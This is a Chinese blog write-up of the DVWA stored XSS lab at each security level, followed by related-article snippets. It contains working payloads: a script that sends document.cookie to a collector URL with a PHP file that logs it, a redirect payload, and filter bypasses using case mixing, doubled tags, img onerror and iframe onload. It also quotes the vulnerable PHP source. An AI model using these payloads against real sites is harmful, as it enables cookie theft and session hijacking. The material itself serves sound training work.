DVWA实验储存型XSS

最新推荐文章于 2024-09-19 11:51:52 发布
最新推荐文章于 2024-09-19 11:51:52 发布
阅读量1.7k 收藏 6
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33605106/article/details/79652620
版权

1.low

直接输入<script>alert(/xss/)</script>测试,只要查看这个日志就会弹出这个信息,依法炮制试试获取cookie


joke.js
var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://localhost/joke/joke.php?joke='+encodeURIComponent(document.cookie);
//<script>alert(/xss/)</script>


joke.php
<?php
    @ini_set('display_errors',1);
    $str = $_GET['joke'];
    $filePath = "joke.php";

    if(is_writable($filePath)==false){
         echo "can't write";
    }else{
          $handler = fopen(filePath, "a");
          fwrite($handler, $str);
          fclose($handler);
    }
?>

输入 <script src="http://localhost/joke/joke.js></script>,发现并未能获取到任何数据,经过查看发现message里面有字数限制,则只需要进行抓包修改即可。因为是做实验可以,把文件名什么的修改的短一点能输入就能获取。那么接下来尝试窗口的跳转


输入<script>window.location="http://baidu.com"</script>即可跳转

实验证明少了http://或者双引号都无法跳转


源码

Stored XSS Source
<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>




trim(string,charlist)
参数描述
string必需。规定要检查的字符串。
charlist

可选。规定从字符串中删除哪些字符。如果被省略,则移除以下所有字符:

  • "\0" - NULL
  • "\t" - 制表符
  • "\n" - 换行
  • "\x0B" - 垂直制表符
  • "\r" - 回车
  • " " - 空格

源码中只是简单的删除了charlist中的符号,并没有过滤任何的标签,当然存在xss漏洞


2.medium

直接输入<script>alert(/xss/)</script>,由下面显示就可以知道,<script>标签被过滤了


输入<sCript>alert(/xss/)</script> 大写后发现还是被过滤了,也就是说这次过滤是不分大小写的

输入<sCr<Script>ipt>alert(/xss/)</script>

输入<sCr<script>ipt>alert(/xss/)</scri</Script>pt> 大写加双写都被过滤了


那么这次肯定就是正则表达式过滤<script>标签了 试试其他的标签

输入<img src="http://localhost/joke.js">

输入<img src=""οnerrοr=alert(/xss/)> 也没有跳出窗口但是Message没有显示,肯定就是没有过滤img标签 了

同样<iframe onload =alert(/xss/)>也没有过滤


很明显了只是过滤了<script>标签,但是这样一来就无法做更多的事情了啊,或许可以加载一张真的图片里面有一条钓鱼。

最后在name中输入<sCr<Script>ipt>alert(/xss/)</script>,然后捉包改变一下字数限制,居然能弹出。

分析在message中做了过滤标签的处理,而在name中也做了但是应该只是简单的过滤了,没有考虑到大小写,和双写问题,应该只是个简单的replace

源码

Stored XSS Source
<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>



strip_tags(string,allow)
参数描述
string必需。规定要检查的字符串。
allow可选。规定允许的标签。这些标签不会被删除。

strip_tags() 函数剥去字符串中的 HTML、XML 以及 PHP 的标签。

注释:该函数始终会剥离 HTML 注释。这点无法通过 allow 参数改变。

注释:该函数是二进制安全的。


addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

预定义字符是:

  • 单引号(')
  • 双引号(")
  • 反斜杠(\)
  • NULL


htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。

预定义的字符是:

  • & (和号)成为 &
  • " (双引号)成为 "
  • ' (单引号)成为 '
  • < (小于)成为 <
  • > (大于)成为 >

用了三个函数来保证message的安全,最后的htmlspecialchars()函数就已经没有任何办法了,而name中只有一个replace真是尴尬,这也提醒了如果message不行就试试name啊,还有以下的直接输入"哈哈"发现自动多了反斜杠,多少也可以知道其中用了什么函数,这也是一个获取信息的思路啊




3.high


可以肯定Message做了和medium一样的防护了,所以不考虑message了,但是在name中不管输入大小学还是双写都没有用了,这时候就该想到黑名单过滤了,正则表达式。

直接输入<s 试试,name直接什么也不显示


在输入<script>,name中显示了>


已经可以确定了还是正则表达式的贪心从<开始匹配<script 除非匹配完整个<script否则一切的输入都被替换成空格,但如输入<script>alert(/xss/)</script 也会是空格,因为匹配完第一个之后,还是从第二个<开始匹配,最后整个变成空格,但是从输入>sa则完全可以显示,因为代码是从<开始匹配


那么可以怎么利用呢 如上所说可以使用 <img > <iframe>标签,因为他们并没有被过滤,但这两个标签似乎没什么威胁了

源码

Stored XSS Source
<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>




preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );

其中/i表示不区分大小写,所有不管用大小写,或者双写都不可能绕过。


4.Impoosible


在Name中输入"哈哈",Message中输入"啊哈哈"不仅加了反斜杠,还把双引号给转字义了

在输入<script>,已经不是换标签的问题了,特殊的符号会被直接转义


Stored XSS Source
<?php

if( isset( $_POST[ 'btnSign' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = stripslashes( $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $name = htmlspecialchars( $name );

    // Update database
    $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
    $data->bindParam( ':message', $message, PDO::PARAM_STR );
    $data->bindParam( ':name', $name, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();

?>




 
 
 
  
 
   

 
   
 
    
 
   
 
  
 
 
 
 
定义和用法
 
 
stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。
 
 
提示:该函数可用于清理从数据库中或者从 HTML 表单中取回的数据。
 
 
 
 并且使用了htmlspecialchars()就没有什么办法了,但是如果htmlspecialchars使用不当,就可以通过编码来绕过 

 

 
 
 

 

最后XSS中绝对不止<script> <img> <iframe>这几个标签可用,并且XSS可以配合CSRF产生巨大的作用
 

 


 

 
 
 

 

 


 


 



                

        

        

    

  


    

      

        

            

              
                
                  killuaZold
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
存储XSS

				
			

			

				

					weixin_45634365的博客
				

				

					03-07
					
					2639
					
				

			

		

		

			
				
一、XSS简介
XSS:用户输入的数据被当做代码执行
#JS代码被触发的三种情况
<script></script>
<a herf=javascript:alert(1)></a>
<img src=1 onerror=alert(1) />

XSS的三种类:
(1)反射
(2)存储
(3)Dom
二、同源策略
浏览器的同源策略,限制了不同源的Js,对当前页面的资源和属性的权限。同源策略保护了a.com域名下的资源不被来自其他网页的脚本

			
		

	



                

            
              



	

		

			

				
					
Dvwa存储XSS攻击全级别学习笔记

				
			

			

				

					Mbys_Lettuce的博客
				

				

					09-19
					
					2064
					
				

			

		

		

			
				
和好像被过滤掉了,会不会像反射一样,只是过滤了,只要复写或者大小写可以攻击了呢?把写入内容修改成alert(document.cookie)或者alert(document.cookie)

			
		

	



              


  
              

                


	

		

			

				
					
存储 XSS

				
			

			

				

					weixin_33777877的博客
				

				

					10-09
					
					314
					
				

			

		

		

			
				
存储XSSXSS***的用处JS-Context存储XSS:1、&lt;/script&gt;闭合当前脚本,然后输入自定义内容。过滤&lt;,&gt;,/替换&lt;/script&gt;为&lt;/’+’script&gt;(网易邮箱)2、根据JS上下文,构造正确的闭合。根据实际情况,进行过滤。通常输出是字符串,在’和"之间,过滤’,"即可和&lt;script&gt;中的XSS一样,过滤’...

			
		

	





	

		

			

				
					
web基础—dvwa靶场(十)XSS

					
最新发布

				
			

			

				

					m0_74080781的博客
				

				

					09-19
					
					1327
					
				

			

		

		

			
				
DOM  XSS是特殊的反射性 XSS,是基于 DOM 文档对象模的漏洞。DOM(Document Object Model) 译为文档对象模,是 HTML 和 XML 文档的编程接口,可以使程序和脚本能动态访问和更新文档的内容、结构和样式。HTML 标签作为结点构成了 DOM 节点树,树中的节点都可以通过 JavaScript 进行访问。

			
		

	



		

			
		



	

		

			

				
					
XSS-存储

				
			

			

				

					qq_39416206的博客
				

				

					03-14
					
					480
					
				

			

		

		

			
				
一、知识点

同源策略:


所谓同源:需要同 域名/host、端口、协议


存储xss是什么


提交恶意xss数据,存入数据库中,访问时触发。


存储xss可能出现的位置


可以插入数据的地方,比如用户注册,留言板,上传文件的文件名处,管理员可见的报错信息


获取到别人的Cookie怎么登陆别人用户


可以使用Burp抓包直接修改抓包数据,也可以使用浏览器修改Cookie,建议火狐浏览器


存储XSS怎么预防?


XSS预防从两点出发,第一点不允许输入恶意字符,第二点不允许输出,都.

			
		

	





	

		

			

				
					
基于DVWAXSS学习_1

				
			

			

				

					m0_47129108的博客
				

				

					12-14
					
					201
					
				

			

		

		

			
				
存储XSS
存储XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie等。参考自:路西法.
攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客,都有可能会执行这段恶意脚本,因此储存XSS的危害会更大。因为存储XSS的代码存在于网页的代码中,可以说是永久的。

			
		

	





	

		

			

				
					
DVWA平台存储XSS实验

				
			

			

				

					KUKULI233的博客
				

				

					05-25
					
					359
					
				

			

		

		

			
				
一、概念
长期存储于服务器端
每次访问都会执行js脚本

黑客将JS脚本发给服务器,服务器就会存在JS脚本,别的用户访问服务器时就会被脚本盗取cookie,黑客在旁监听

前几步相同,用户访问带有JS脚本的服务器时被重定向到第三方网站
二、使用场景
直接嵌入<script>alert(‘xss’)</script>
元素事件<body onload=alert(‘xss’)>
<a href=http://192.168.>click</a>
&l

			
		

	





	

		

			

				
					
DVWA存储XSS

				
			

			

				

					qq_39682037的博客
				

				

					03-19
					
					2367
					
				

			

		

		

			
				
存储XSS
Security Level: low

源码

<?php 
if( isset( $_POST[ 'btnSign' ] ) ) { 
    // Get input 
    $message = trim( $_POST[ 'mtxMessage' ] ); 
    $name    = trim( $_POST[ 'txtName' ] ); 
    // Sa...

			
		

	





	

		

			

				
					
Kali渗透测试之DVWA系列5——存储XSS(跨站脚本攻击)

				
			

			

				

					浅浅的博客
				

				

					05-11
					
					2956
					
				

			

		

		

			
				
目录

一、原理示意图

二、实验环境

三、实验步骤

 安全级别:LOW

 重定向

 获取cookie

 安全级别:Medium

 安全级别:High

 安全级别:Impossible

存储XSS


长期存储于服务器端
	每次用户访问都会被执行javascript脚本


了解XSS简...

			
		

	





	

		

			

				
					
DVWA靶场笔记之xss(DOM)原理

				
			

			

				

					Alonegrief的博客
				

				

					11-30
					
					2529
					
				

			

		

		

			
				
原理:
Xss又叫跨站脚本攻击。他指的是恶意攻击者往web页面插入恶意html代码,当用户浏览该页面之时,嵌入其中web的html代码会被执行,从而达到恶意的特殊目的
Xss漏洞分为三类:
一、	反射xss:非持久化,攻击者事先制作好攻击连接,需要欺骗用户自己去点击连接才能触发xss代码(服务器中没有这样的页面和内容),一般容易出现搜索页面
二、	存储xss:持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将存储到服务器中,每当有用户访问该页面

			
		

	





	

		

			

				
					
存储xss

				
			

			

				

					weixin_42576186的博客
				

				

					12-26
					
					411
					
				

			

		

		

			
				
存储XSS(Cross-Site Scripting)是一种常见的Web安全漏洞,它指的是攻击者往Web应用程序中注入恶意代码,被存储在服务器端,当其他用户浏览这些页面时,嵌入的恶意代码就会被执行。
存储XSS攻击通常发生在用户留言板、论坛和博客等功能中,攻击者可以在留言板中发布带有恶意代码的留言,当其他用户浏览留言板时就会受到攻击。存储XSS攻击也可能发生在用户提交表单时,如果Web应用程...

			
		

	





	

		

			

				
					
存储XSS(Cross-Site Scripting)

				
			

			

				

					qq_69100706的博客
				

				

					07-30
					
					290
					
				

			

		

		

			
				
在CTF(Capture The Flag)竞赛中,存储XSS(Cross-Site Scripting)攻击是一种利用Web应用程序将恶意脚本永久存储在服务器上的漏洞。不同于反射XSS存储XSS不需要用户点击特定的链接来激活恶意脚本,因为它存储在服务器的数据库或文件系统中,并在每次请求相关的页面或数据时执行。

			
		

	





	

		

			

				
					
XSS存储xss

				
			

			

				

					wwwwyyyrre的博客
				

				

					06-17
					
					3391
					
				

			

		

		

			
				
每当有用户访问包含恶意代码的页面时,就会触发代码的执行,从而达到攻击目的。有别于反射XSS编写一次代码只能进行一次攻击的特点,存储XSS的恶意脚本一旦存储到服务器端,就能多次被使用,称之为“持久XSS”。存储XSS比反射XSS的危害更大,在于它不需要构造特殊的URL,用户访问的是一个正常的URL也可以被攻击;另一方面,它持久化在服务端,影响的范围可以比反射XSS更广。一个重要条件是,web应用中的用户之间有一定的交互,而非各玩各的。比方说,博客、论坛等,。

			
		

	





	

		

			

				
					
DVWA 实验报告:10、XSS 存储

				
			

			

				

					看那白熊
				

				

					05-30
					
					830
					
				

			

		

		

			
				
占位



			
		

	





	

		

			

				
					
web ---- 存储 XSS

				
			

			

				

					L0g1c的博客
				

				

					07-23
					
					1766
					
				

			

		

		

			
				
Js操纵的主体是浏览器,窃取的当然是浏览器的Cookie,所以有XSS的地方,你如果抓包改Cookie去访问,XSS是吃不到你修改过的Cookie,其实你访问的时候抓包就可以看到,第一次访问正常页面,第二次会GET传参访问XSS平台。以前也搭建过XSS平台,其实后台可以看到所有用户的Cookie,当你用了别人的XSS平台其实就要注意信息泄露这个问题,而且访问XSS平台和XSS页面建议使用无痕,天知道,他们会不会在脚本里面做手脚。...

			
		

	





	

		

			

				
					
xss存储

				
			

			

				

					xu_1234567的博客
				

				

					11-04
					
					4812
					
				

			

		

		

			
				
1.存储xss原理
存储xss是hacker向服务器注入一段js代码,代码存储到服务器的数据库中,每当用户访问服务器当中带有js代码的数据时,服务器将响应用户,返回给用户一个带有js代码页面
2.xss存储low级演示
1.将DVWA级别设置为低级

分析源码,可以看到首先对两个参数使用trim函数过滤掉两边的空格,然后$message使用mysql_real_escape_string函数转义SQL语句中的特殊字符,使用stripslashes函数过滤掉”\”,对$name参数中使用mysql_re

			
		

	





	

		

			

				
					
[实验]xss dvwa

				
			

			

				

					foolisheddy
				

				

					03-19
					
					2569
					
				

			

		

		

			
				
初次接触xss

反射XSS

存储XSS

漏洞利用

参考list

			
		

	





	

		

			

				
					
dvwa存储xss获取cookie

				
			

			

				

					06-06
				

			

		

		

			
				
DVWA存储XSS攻击可以通过注入恶意脚本来获取用户的cookie信息。攻击者可以在DVWA应用程序中的输入框中注入恶意脚本,当用户访问受影响的页面时,恶意脚本会被执行,将用户的cookie信息发送到攻击者的服务器上。...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值